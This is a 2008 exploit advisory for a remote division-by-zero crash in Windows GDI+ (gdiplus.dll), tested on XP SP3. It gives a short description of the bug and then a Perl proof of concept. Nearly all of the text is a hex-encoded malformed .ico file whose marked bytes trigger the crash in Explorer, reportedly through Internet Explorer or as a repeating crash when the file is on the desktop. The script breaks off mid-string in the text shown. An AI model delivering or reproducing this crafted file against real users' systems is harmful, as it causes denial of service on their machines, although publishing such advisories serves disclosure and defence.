MS Windows GDI+ (.ico File) Remote Division By Zero Exploit

2008-09-26 22:01:04

MS Windows GDI+ .ico Remote Division By Zero

Application: GDIPLUS.DLL

Web Site: http://www.microsoft.com/

Platform: Windows *

Bug: Division By Zero

Tested agains: XP SP3 fully patched

Note: This have nothing to do with http://milw0rm.com/exploits/4044
-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

================

1) Introduction

================

"The Microsoft Windows graphics device interface (GDI) enables applications to use graphics
and formatted text on both the video display and the printer. Windows-based applications do
not access the graphics hardware directly. Instead, GDI interacts with device drivers on
behalf of applications."

=======

2) Bug

=======

GDIPLUS fails to handle exceptional condition when opening malicious .ico files.
This result in a remote explorer crash (via IE), and a constant loop crash if the ico file
is located on the desktop

==================

3)Proof of concept

==================

#!/usr/bin/perl

use strict;

my $icofile =
"\x00\x00\x01\x00\x0c\x00\x30\x30\x10\x00\x01\x00\x04\x00\x68\x06\x00\x00\xc6\x00".
"\x00\x00\x20\x20\x10\x00\x01\x00\x04\x00\xe8\x02\x00\x00\x2e\x07\x00\x00\x18\x18".
"\x10\x00\x01\x00\x04\x00\xe8\x01\x00\x00\x16\x0a\x00\x00\x10\x10\x10\x00\x01\x00".
"\x04\x00\x28\x01\x00\x00\xfe\x0b\x00\x00\x30\x30\x00\x00\x01\x00\x08\x00\xa8\x0e".
"\x00\x00\x26\x0d\x00\x00\x20\x20\x00\x00\x01\x00\x08\x00\xa8\x08\x00\x00\xce\x1b".
"\x00\x00\x18\x18\x00\x00\x01\x00\x08\x00\xc8\x06\x00\x00\x76\x24\x00\x00\x10\x10".
"\x00\x00\x01\x00\x08\x00\x68\x05\x00\x00\x3e\x2b\x00\x00\x30\x30\x00\x00\x01\x00".
"\x20\x00\xa8\x25\x00\x00\xa6\x30\x00\x00\x20\x20\x00\x00\x01\x00\x20\x00\xa8\x10".
"\x00\x00\x4e\x56\x00\x00\x18\x18\x00\x00\x01\x00\x20\x00\x88\x09\x00\x00\xf6\x66".
"\x00\x00\x10\x10\x00\x00\x01\x00\x20\x00\x68\x04\x00\x00\x7e\x70\x00\x00\x28\x00".
"\x00\x00\x30\x80\x00\x00\x00". # it happens here
"\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x04\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80".
"\x00\x80\x80\x00\x00\x80\x80\x80\x00\xc0\xc0\xc0\x00\x00\x00\xff\x00\x00\xff\x00".
"\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x66\x66\x66\x67\x80\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x7e\x8f\xf8\xff\x88\xe7".
"\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x67\x8f\xf8\x86".
"\x6c\x66\x7e\x88\xf8\x76\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x6e".
"\xff\x86\x6c\x6c\x66\x6c\x6c\x66\x68\x8f\x66\x80\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x66\xf8\x76\xc6\x66\x66\x66\x66\x66\x6c\x66\x6e\xf8\x66\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x8f\x8c\x66\x66\xc6\xec\x6c\xec\x66\xc6\x6c\x6c\x68\xf8".
"\x60\x00\x00\x00\x00\x00\x00\x00\x00\x68\xf6\x66\x6c\xe6\x6c\x66\x66\x66\x66\xe6".
"\x66\x66\x6c\x6f\x86\x00\x00\x00\x00\x00\x00\x00\x06\xf8\x6c\x6c\xe6\x6c\x6e\x66".
"\xce\x6c\x6c\x6c\x6c\x6c\x66\x66\x8f\x60\x00\x00\x00\x00\x00\x00\x6f\x8c\x66\xe6".
"\x6c\x66\x66\xc6\x66\x66\xe6\x66\x6e\x66\x66\xc6\x68\x86\x00\x00\x00\x00\x00\x06".
"\x88\x66\xe6\xc6\x66\xe6\xce\x6e\xc6\xc6\xc6\x66\xc6\x6c\x66\x6c\x66\x88\x60\x00".
"\x00\x00\x00\x68\xf6\xc6\xc6\x66\xec\x66\x66\xc6\x6e\x6e\x66\xce\x66\x6e\xc6\xe6".
"\x6c\x6f\x86\x00\x00\x00\x08\x6f\xff\x8e\x66\xec\x66\xce\xce\x66\xc6\x6c\x6e\x66".
"\xc6\xc6\x66\xc6\x66\x66\xf6\x80\x00\x00\x06\x8f\xff\xff\x7c\x66\xe6\x66\x66\xce".
"\x6e\x66\xc6\xc6\xe6\xef\x8f\x8f\x88\xf8\xf8\x60\x00\x00\x7e\xf6\xff\xff\xff\xec".
"\x6c\xe6\xec\xe6\x6c\xe6\xe6\xe6\xc8\xff\xff\xff\xff\xff\xff\x7e\x00\x00\x6f\x76".
"\x68\xff\xff\xf8\xe6\x6c\x66\x6e\xc6\x6c\x66\xc6\x8f\xff\xff\xff\xff\xf8\x6e\xf4".
"\x00\x00\x78\xec\xe6\x8f\xff\xff\xfe\x6e\x6e\xc6\xe6\xe6\xec\xef\xff\xff\xff\xff".
"\xff\x86\x6c\xf7\x00\x06\x88\x66\xc6\xe7\xff\xff\xff\x87\xce\x6e\xc6\xce\x67\xff".
"\xff\xff\xff\xff\xf6\x6c\x66\x88\xe0\x06\xf6\xce\x6e\xc6\xef\xff\xff\xff\x8e\x66".
"\xe6\xe6\x8f\xff\xff\xff\xff\xf8\x6e\x66\x66\xe8\x60\x07\xf6\xe6\xc6\xe6\xce\x8f".
"\xff\xff\xff\x8c\xec\x68\xff\xff\xff\xff\xff\x86\xc6\xc6\xc6\xcf\x70\x8e\x8c\x66".
"\xe6\xce\x66\xe8\xff\xff\xff\xff\x6e\xff\xff\xff\xff\xff\xf6\xe6\x6e\x66\xe6\x68".
"\xe8\x68\x8e\x6c\xe6\xe6\xec\x6e\x8f\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xec\x6c".
"\x6c\x66\xc6\x68\x86\x68\xec\xe6\x6c\x6c\xe6\xec\xe7\xff\xff\xff\xff\xff\xff\xff".
"\xff\x86\x66\xe6\xe6\x6c\x66\xce\x8c\x6f\x66\x6e\xce\xe6\xec\xe6\xec\xef\xff\xff".
"\xff\xff\xff\xff\x8e\x6e\xce\xc6\xc6\xe6\xe6\x66\xf6\x6f\x6e\xc6\xe6\x6e\xce\x6e".
"\xce\x6e\x8f\xff\xff\xff\xff\xf8\xec\x6c\xe6\x6e\x66\xc6\xc6\xc6\xf6\x68\xc6\xe6".
"\xce\xce\x6e\xce\x6e\xc8\xff\xff\xff\xff\xff\xff\xe6\xe6\x6c\x66\xce\x66\x66\xe6".
"\xf6\x6f\xe6\xce\x6e\x6e\xce\x6e\xce\x8f\xff\xff\xff\xff\xff\xff\xf8\xce\x6e\x6e".
"\x66\xce\x6c\x67\x86\x68\x8e\x6e\xce\xce\x6e\xce\xef\xff\xff\xff\xff\xff\xff\xff".
"\xff\x8e\xc6\xec\x6e\x66\x66\x6e\x8c\x78\xec\x6e\x6e\x6e\xce\x68\xff\xff\xff\xff".
"\xff\x8f\xff\xff\xff\xf8\xe6\xc6\x6c\x6c\xec\x68\x87\xe8\x8e\xce\xc6\xec\xe6\xff".
"\xff\xff\xff\xff\xf8\xee\x8f\xff\xff\xff\xfe\x6e\x6e\x66\x66\x68\xe8\x06\xf6\xe6".
"\xec\xe6\xef\xff\xff\xff\xff\xff\xee\xce\x6e\xff\xff\xff\xff\x8c\x6c\xe6\xce\xcf".
"\x70\x06\xf6\xce\x6e\x68\xff\xff\xff\xff\xff\x8e\xce\xe6\xec\xe8\xff\xff\xff\xf8".
"\xe6\x6c\x66\x6f\x60\x06\x88\xe6\x6e\x8f\xff\xff\xff\xff\xf8\xee\xe6\xec\xe6\xec".
"\xe8\xff\xff\xff\x8e\x6e\x66\x88\x60\x00\x7f\x6e\xcf\xff\xff\xff\xff\xff\xee\xce".
"\xce\xe6\xec\xe6\xe6\x8f\xff\xff\xff\xc6\xce\xf6\x00\x00\x6f\xe8\xff\xff\xff\xff".
"\xff\xfe\xce\xee\xec\xec\xee\x6e\xce\x6e\x8f\xff\xff\xf8\x67\xf6\x00\x00\x86\xff".
"\xff\xff\xff\xff\xf8\xee\xee\xce\x6e\xee\x6e\xce\x6e\xc6\xe6\x8f\xff\xff\x8f\x68".
"\x00\x00\x06\x8f\x88\x88\x88\xe8\x8e\xce\xce\xe6\xec\xec\xe6\xe6\xec\xe6\xce\x68".
"\xff\xff\xf8\x60\x00\x00\x08\xcf\xee\xce\xee\xce\xee\xe6\xe6\xec\xee\x6e\xce\xce".
"\x6e\x6e\x6c\xe6\x68\xff\xf6\x80\x00\x00\x00\x68\x8e\x6e\xce\xe6\xce\xce\xec\xee".
"\x6e\xce\xe6\xec\xec\xec\xe6\x6c\xe6\xef\x86\x00\x00\x00\x00\x06\x88\xec\xe6\xee".
"\xe6\xe6\xee\x6e\xce\xe6\xec\xe6\xe6\x6e\x6c\xe6\x6c\x88\x60\x00\x00\x00\x00\x00".
"\x68\x8e\x6e\xc6\xec\xee\xce\xce\xe6\xec\xe6\xec\xec\xec\xe6\x6e\x6f\x86\x00\x00".
"\x00\x00\x00\x00\x06\xf8\xec\xee\xce\x6e\x6e\xe6\xec\xe6\xec\xe6\xe6\xe6\x6e\xc6".
"\x88\x60\x00\x00\x00\x00\x00\x00\x00\x68\xfe\x6e\x6e\xce\xce\xce\x6e\xce\x6e\x6e".
"\xc6\xce\xc6\xef\x86\x00\x00\x00\x00\x00\x00\x00\x00\x06\x88\x8c\xe6\xee\x6e\x6e".
"\xce\x6e\xce\xc6\xee\x66\xe8\xf8\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00\x67\x8f".
"\xee\xce\xce\x6e\x6e\xce\x6e\x6e\xc6\xe8\x88\x6c\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x08\x68\x8f\x8e\x6e\xce\xce\x6e\xce\xc6\xe8\xf8\xec\x80\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x0e\x47\x8f\xf8\x8e\x8e\x68\xe8\xff\xf8\x6c\x80\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x68\x88\x8f\x88\x88\xe7".
"\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xe6".
"\xc6\x66\xc7\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xe0\x07\xff\xff\x00".
"\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xf8\x00\x00\x1f\xff\x00\x00\xff\xe0\x00".
"\x00\x07\xff\x00\x00\xff\xc0\x00\x00\x03\xff\x00\x00\xff\x80\x00\x00\x01\xff\x00".
"\x00\xff\x00\x00\x00\x00\xff\x00\x00\xfe\x00\x00\x00\x00\x7f\x00\x00\xfc\x00\x00".
"\x00\x00\x3f\x00\x00\xf8\x00\x00\x00\x00\x1f\x00\x00\xf0\x00\x00\x00\x00\x0f\x00".
"\x00\xe0\x00\x00\x00\x00\x07\x00\x00\xe0\x00\x00\x00\x00\x07\x00\x00\xc0\x00\x00".
"\x00\x00\x03\x00\x00\xc0\x00\x00\x00\x00\x03\x00\x00\xc0\x00\x00\x00\x00\x03\x00".
"\x00\x80\x00\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x00\x01\x00\x00\x80\x00\x00".
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x00\x01\x00".
"\x00\x80\x00\x00\x00\x00\x01\x00\x00\xc0\x00\x00\x00\x00\x03\x00\x00\xc0\x00\x00".
"\x00\x00\x03\x00\x00\xc0\x00\x00\x00\x00\x03\x00\x00\xe0\x00\x00\x00\x00\x07\x00".
"\x00\xe0\x00\x00\x00\x00\x07\x00\x00\xf0\x00\x00\x00\x00\x0f\x00\x00\xf8\x00\x00".
"\x00\x00\x1f\x00\x00\xfc\x00\x00\x00\x00\x3f\x00\x00\xfe\x00\x00\x00\x00\x7f\x00".
"\x00\xff\x00\x00\x00\x00\xff\x00\x00\xff\x80\x00\x00\x01\xff\x00\x00\xff\xc0\x00".
"\x00\x03\xff\x00\x00\xff\xe0\x00\x00\x07\xff\x00\x00\xff\xf8\x00\x00\x1f\xff\x00".
"\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\xe0\x07\xff\xff\x00\x00\x28\x00\x00".
"\x00\x20\x00\x00\x00\x40\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x02\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80".
"\x00\x80\x80\x00\x00\x80\x80\x80\x00\xc0\xc0\xc0\x00\x00\x00\xff\x00\x00\xff\x00".
"\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff".
"\x00\x00\x00\x00\x00\x00\x00\x76\x76\x76\x7e\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x07\x68\xf8\x8e\x88\x88\x87\xe0\x00\x00\x00\x00\x00\x00\x00\x08\x6f\x86\x6c".
"\x66\xc6\x6c\x68\x87\x80\x00\x00\x00\x00\x00\x00\x68\x86\xc6\xe6\x66\x6c\x66\x66".
"\xc8\x86\x00\x00\x00\x00\x00\x07\x8e\xc6\xe6\xc6\xc6\x6e\x66\xc6\xe6\x6f\x60\x00".
"\x00\x00\x00\x6f\x66\x66\xc6\x66\xe6\xc6\xc6\xe6\x46\xc6\xf6\x00\x00\x00\x07\x86".
"\xc6\xe6\x66\xec\x66\x66\xe6\xc6\x66\x66\x6f\x60\x00\x00\x88\xfe\x66\xc6\xc6\x66".
"\xce\xc6\xc6\x66\xce\xc6\x6c\xf8\x00\x00\x6f\xff\xfe\x6e\x6e\xce\x66\x6e\x66\xe7".
"\xf8\xff\xff\xf6\x00\x07\xf6\x8f\xff\x8c\x66\x66\xec\x66\xc6\x8f\xff\xff\xf8\xef".
"\x70\x06\x86\xce\xff\xff\x8e\xce\x66\xe6\xe8\xff\xff\xff\x86\x68\xc0\x08\xe6\xe6".
"\x6f\xff\xff\xe6\xce\xce\xff\xff\xff\xf8\x6c\x66\xf0\x78\x6c\x6c\xe6\x8f\xff\xf8".
"\xe6\x8f\xff\xff\xff\x66\xe6\x6c\x88\x6f\x6e\x6e\xce\x68\xff\xff\xf8\xff\xff\xff".
"\x86\xec\x6c\x6e\x86\x68\xec\x6e\x66\xec\xef\xff\xff\xff\xff\xf8\xec\x66\x6e\x66".
"\x86\x7e\x66\xec\xec\xe6\xe7\xff\xff\xff\xf8\xec\x66\xec\x66\xc6\x86\x68\xce\x66".
"\xe6\xec\xe8\xff\xff\xff\xff\x86\xec\x66\xec\x66\xe7\x7e\x6e\xce\xce\x6e\x8f\xff".
"\xff\xff\xff\xf8\x6e\x6c\x66\xec\x86\x6f\xce\x6e\x6e\x7f\xff\xff\xff\x8f\xff\xff".
"\x8e\x6e\x66\x66\x86\x88\xe6\xce\xc8\xff\xff\xff\x8e\xe6\x8f\xff\xf8\xec\x6c\xec".
"\xf8\x08\x6e\x6e\xff\xff\xff\xf8\xec\xee\xce\xff\xff\xf8\x6e\x66\x80\x06\x8e\x7f".
"\xff\xff\xff\xee\xee\xce\xe6\xe8\xff\xff\x8c\x68\x60\x08\x88\xff\xff\xff\xfe\xec".
"\xe6\xe6\xec\xec\xe8\xff\xf8\xe8\x80\x00\xe8\x88\x88\x88\xec\xee\xce\xec\xe6\xe6".
"\x6e\x78\xff\xf6\x00\x00\x88\xee\xee\xee\xee\x6e\xec\xe6\xec\xec\xec\xe6\x8f\x88".
"\x00\x00\x06\x8c\x6c\xec\x6e\xce\x6e\xec\xe6\xe6\x66\xce\x68\x60\x00\x00\x00\x7f".
"\xee\x6e\xec\xee\xce\x6e\x6e\xce\xce\x66\xf6\x00\x00\x00\x00\x06\x8e\xce\x6e\x6e".
"\x6e\xce\xce\x6e\x66\xe8\x60\x00\x00\x00\x00\x00\x78\x8e\xce\xce\x6e\x6e\x6e\xc6".
"\xe8\x87\x00\x00\x00\x00\x00\x00\x08\x6f\x8e\xec\xec\xec\xe6\xe8\x87\xe0\x00\x00".
"\x00\x00\x00\x00\x00\x0e\x78\x8f\x8e\x88\x88\x8c\x80\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x86\x67\xe6\x7e\x00\x00\x00\x00\x00\x00\xff\xf0\x0f\xff\xff\x80\x01".
"\xff\xfe\x00\x00\x7f\xfc\x00\x00\x3f\xf8\x00\x00\x1f\xf0\x00\x00\x0f\xe0\x00\x00".
"\x07\xc0\x00\x00\x03\xc0\x00\x00\x03\x80\x00\x00\x01\x80\x00\x00\x01\x80\x00\x00".
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x01\x80\x00\x00".
"\x01\x80\x00\x00\x01\xc0\x00\x00\x03\xc0\x00\x00\x03\xe0\x00\x00\x07\xf0\x00\x00".
"\x0f\xf8\x00\x00\x1f\xfc\x00\x00\x3f\xfe\x00\x00\x7f\xff\x80\x01\xff\xff\xf0\x0f".
"\xff\x28\x00\x00\x00\x18\x00\x00\x00\x30\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00".
"\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00".
"\x00\x80\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xc0\xc0\xc0\x00\x00\x00\xff".
"\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00".
"\x00\xff\xff\xff\x00\x00\x00\x00\x00\x07\x87\xe7\x80\x00\x00\x00\x00\x00\x00\x00".
"\x78\x8e\x66\xc6\x88\x86\x00\x00\x00\x00\x00\x08\xe6\xc6\xc6\x66\xc6\x68\x80\x00".
"\x00\x00\x00\x86\xc6\x66\x6e\x66\x66\xc6\xe8\x00\x00\x00\x08\x66\xe6\x6e\xc6\xc6".
"\xce\x66\xc6\x80\x00\x00\x78\xec\x6c\x66\x66\xe6\x66\x66\x66\x68\x00\x08\x8f\xf8".
"\x6e\x6c\xec\x6c\xec\xff\xff\xf8\x80\x08\x6e\x8f\xf7\xe6\x6e\x66\x7f\xff\xff\x86".
"\x80\x08\xc6\xe8\xff\x8e\xc6\xe8\xff\xff\x8e\xc6\x80\x7e\x6e\xc6\x8f\xff\x8e\x88".
"\xff\xf8\x66\x66\xe7\x8e\xc6\xe6\xe8\xff\xff\xff\xff\x8e\xc6\xc6\x78\x76\xe6\xce".
"\xce\x7f\xff\xff\xfe\x66\xe6\xe6\xce\x86\xce\x6e\x6e\x8f\xff\xff\xf8\xce\xc6\xc6".
"\x68\xe7\xe6\xec\xe8\xff\xff\xff\xff\x86\x6e\x66\xe7\x7e\xce\x6e\xff\xff\xfe\x68".
"\xff\xff\x6c\x6c\x87\x08\xe6\x8f\xff\xff\xec\xee\x68\xff\xfe\x6e\x80\x08\xe8\xff".
"\xff\x8e\xee\x6e\xce\xef\xff\x86\x80\x07\xf8\xf8\xf8\xec\xec\xe6\xe6\xc6\x8f\xf8".
"\xe0\x00\x8e\xce\xec\xee\xee\xce\xce\xe6\xe6\x88\x00\x00\x08\xe6\xee\x6e\xce\x6e".
"\x6e\xc6\xce\x80\x00\x00\x00\x8e\xce\xce\x6e\xce\x6e\x6e\x78\x00\x00\x00\x00\x08".
"\x8e\x6e\xce\x6e\xce\xc8\xe0\x00\x00\x00\x00\x00\x78\x8e\x8e\xce\x88\x87\x00\x00".
"\x00\x00\x00\x00\x00\x07\xe7\x87\xe0\x00\x00\x00\x00\xff\x81\xff\x00\xfc\x00\x3f".
"\x00\xf8\x00\x1f\x00\xf0\x00\x0f\x00\xe0\x00\x07\x00\xc0\x00\x03\x00\x80\x00\x01".
"\x00\x80\x00\x01\x00\x80\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x01\x00\x80\x00\x01".
"\x00\x80\x00\x01\x00\xc0\x00\x03\x00\xe0\x00\x07\x00\xf0\x00\x0f\x00\xf8\x00\x1f".
"\x00\xfc\x00\x3f\x00\xff\x81\xff\x00\x28\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00".
"\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00".
"\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80".
"\x00\xc0\xc0\xc0\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00".
"\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x08\x7e\x78\x80\x00".
"\x00\x00\x08\x7e\x46\x6c\x68\x80\x00\x00\x7e\x6c\x66\x66\x66\x68\x00\x08\x8c\x66".
"\xec\xec\x6c\x6e\x80\x08\x8f\xe6\x66\x66\x8f\xf8\x80\x8e\x68\xf8\xec\xe8\xff\xf6".
"\x68\x7c\xe6\x8f\xf8\x8f\xf8\x6c\xe7\xe6\x6e\xce\xff\xff\xe6\xe6\x67\x7e\xce\x68".
"\xff\xff\x8c\x6c\x6e\x86\xe6\xff\xf8\xef\xf8\xe6\x68\x8e\x7f\xff\x8e\x6e\x8f\xf6".
"\x68\x08\x8f\x8e\xee\xce\x6e\x8f\x80\x08\xee\xec\xe6\xec\xec\x68\x80\x00\x77\xe6".
"\xec\xe6\xe6\xe8\x00\x00\x08\xe7\xe6\xec\xe8\x80\x00\x00\x00\x08\x7e\x78\x80\x00".
"\x00\xf8\x1f\x00\x00\xe0\x07\x00\x00\xc0\x03\x00\x00\x80\x01\x00\x00\x80\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x80\x01\x00\x00\x80\x01\x00\x00\xc0\x03\x00\x00\xe0\x07\x00".
"\x00\xf8\x1f\x00\x00\x28\x00\x00\x00\x30\x00\x00\x00\x60\x00\x00\x00\x01\x00\x08".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00".
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\xa1\x6a\x00\x00\xa3\x6c\x00\x00\xa4\x6d\x00".
"\x00\xa2\x6c\x05\x00\xa5\x6f\x06\x00\xa3\x6e\x09\x00\xa4\x6f\x09\x00\xa7\x70\x00".
"\x00\xa7\x71\x07\x00\xa9\x71\x00\x00\xac\x73\x00\x00\xad\x75\x00\x00\xad\x76\x05".
"\x00\xae\x78\x05\x00\xa4\x70\x0b\x00\xa4\x70\x0c\x00\xa9\x73\x08\x00\xaa\x75\x0d".
"\x00\xae\x79\x0d\x00\xb0\x77\x00\x00\xb1\x78\x00\x00\xb4\x7a\x00\x00\xb6\x7c\x00".
"\x00\xb4\x7d\x07\x00\xb8\x7e\x00\x00\xb6\x7f\x0a\x00\xa8\x77\x17\x00\xa9\x77\x18".
"\x00\xaf\x7d\x19\x00\xaa\x7a\x1d\x00\xb0\x7d\x19\x00\xae\x7f\x27\x00\xba\x80\x00".
"\x00\xbc\x82\x00\x00\xbe\x84\x00\x00\xb8\x80\x07\x00\xbc\x83\x05\x00\xbe\x85\x06".
"\x00\xbd\x89\x16\x00\xaf\x81\x2a\x00\xb0\x82\x2a\x00\xb2\x84\x28\x00\xb5\x86\x29".
"\x00\xb0\x82\x2c\x00\xb1\x84\x2d\x00\xbb\x8d\x2c\x00\xb2\x86\x31\x00\xb4\x87\x32".
"\x00\xb5\x8a\x38\x00\xb6\x8d\x3d\x00\xb8\x8e\x3f\x00\xbe\x90\x33\x00\xc1\x86\x00".
"\x00\xc3\x88\x00\x00\xc4\x89\x00\x00\xc7\x8c\x00\x00\xc1\x88\x06\x00\xc6\x8c\x05".
"\x00\xc9\x8d\x00\x00\xcc\x8f\x00\x00\xc8\x8e\x04\x00\xc4\x8c\x0c\x00\xcd\x90\x00".
"\x00\xcb\x90\x06\x00\xcc\x92\x08\x00\xd1\x94\x00\x00\xd5\x98\x00\x00\xda\x9c\x00".
"\x00\xd0\x96\x0a\x00\xd7\x9c\x08\x00\xc6\x8f\x10\x00\xc5\x90\x1a\x00\xc5\x92\x1d".
"\x00\xc9\x95\x1a\x00\xd5\x9d\x13\x00\xd3\x9c\x16\x00\xde\xa0\x00\x00\xd8\xa1\x16".
"\x00\xd6\xa1\x1d\x00\xde\xa9\x1d\x00\xe3\xa4\x00\x00\xeb\xaa\x00\x00\xe5\xa8\x09".
"\x00\xe9\xad\x0c\x00\xf0\xae\x00\x00\xf4\xb2\x00\x00\xf8\xb6\x00\x00\xfc\xb9\x00".
"\x00\xe0\xa6\x10\x00\xe4\xaa\x12\x00\xf9\xbc\x12\x00\xc8\x96\x23\x00\xc9\x9a\x2d".
"\x00\xcd\x9d\x2d\x00\xd2\x9e\x21\x00\xc5\x96\x30\x00\xc2\x95\x37\x00\xca\x9e\x3d".
"\x00\xd9\xa4\x20\x00\xd2\xa1\x2b\x00\xda\xab\x32\x00\xd0\xa3\x3b\x00\xd5\xa7\x38".
"\x00\xd8\xab\x3d\x00\xe8\xb1\x24\x00\xe2\xb0\x2f\x00\xed\xb8\x29\x00\xe5\xb4\x32".
"\x00\xec\xba\x31\x00\xe4\xb5\x3a\x00\xf9\xc4\x2d\x00\xb8\x8f\x40\x00\xb9\x91\x45".
"\x00\xbb\x94\x4b\x00\xbc\x95\x4b\x00\xbf\x98\x4d\x00\xc2\x9b\x4e\x00\xc2\x9f\x5b".
"\x00\xc1\x9e\x5c\x00\xd7\xab\x43\x00\xd7\xad\x4a\x00\xde\xb3\x44\x00\xda\xb1\x4d".
"\x00\xcf\xa8\x53\x00\xce\xa8\x56\x00\xc4\xa1\x5c\x00\xce\xaa\x5f\x00\xd1\xab\x55".
"\x00\xd9\xb2\x56\x00\xe8\xba\x42\x00\xe2\xbc\x5a\x00\xc6\xa5\x67\x00\xca\xa7\x60".
"\x00\xc7\xa6\x68\x00\xc8\xa8\x6b\x00\xda\xb6\x61\x00\xdd\xb8\x62\x00\xdd\xba\x67".
"\x00\xd3\xb2\x69\x00\xdd\xbd\x6e\x00\xcb\xac\x73\x00\xcb\xad\x75\x00\xcc\xae\x77".
"\x00\xce\xb0\x76\x00\xce\xb3\x7e\x00\xdc\xbc\x71\x00\xd1\xb4\x79\x00\xdc\xbe\x7b".
"\x00\xee\xc5\x54\x00\xe7\xc1\x5c\x00\xf6\xce\x5b\x00\xfd\xd2\x54\x00\xdf\xc1\x7b".
"\x00\xee\xc8\x63\x00\xe5\xc2\x6a\x00\xe9\xc5\x68\x00\xef\xcd\x6f\x00\xf2\xcb\x62".
"\x00\xe5\xc5\x75\x00\xe3\xc5\x7d\x00\xe8\xca\x7b\x00\xee\xd0\x7f\x00\xcf\xb4\x80".
"\x00\xd0\xb5\x82\x00\xd7\xbc\x85\x00\xd8\xbd\x85\x00\xdb\xc0\x85\x00\xdf\xc7\x92".
"\x00\xdf\xc7\x95\x00\xda\xc5\x9d\x00\xdf\xc9\x9a\x00\xe5\xcb\x8a\x00\xe9\xce\x89".
"\x00\xf0\xd5\x8a\x00\xf7\xdc\x8d\x00\xf9\xde\x8b\x00\xe2\xc9\x90\x00\xe3\xcd\x9a".
"\x00\xed\xd4\x92\x00\xe7\xd2\x9f\x00\xea\xd4\x9c\x00\xec\xd6\x9f\x00\xf0\xd7\x94".
"\x00\xf3\xda\x96\x00\xf8\xde\x97\x00\xf9\xdf\x98\x00\xfe\xe0\x86\x00\xdb\xc7\xa1".
"\x00\xdc\xc8\xa2\x00\xdd\xca\xa6\x00\xe1\xce\xa8\x00\xe0\xcf\xaf\x00\xe6\xd2\xa6".
"\x00\xed\xd9\xa6\x00\xe7\xd4\xaa\x00\xee\xdb\xac\x00\xf3\xdf\xa9\x00\xe3\xd2\xb0".
"\x00\xe4\xd3\xb0\x00\xe3\xd4\xb7\x00\xe9\xd8\xb2\x00\xe8\xda\xbd\x00\xec\xdd\xbc".
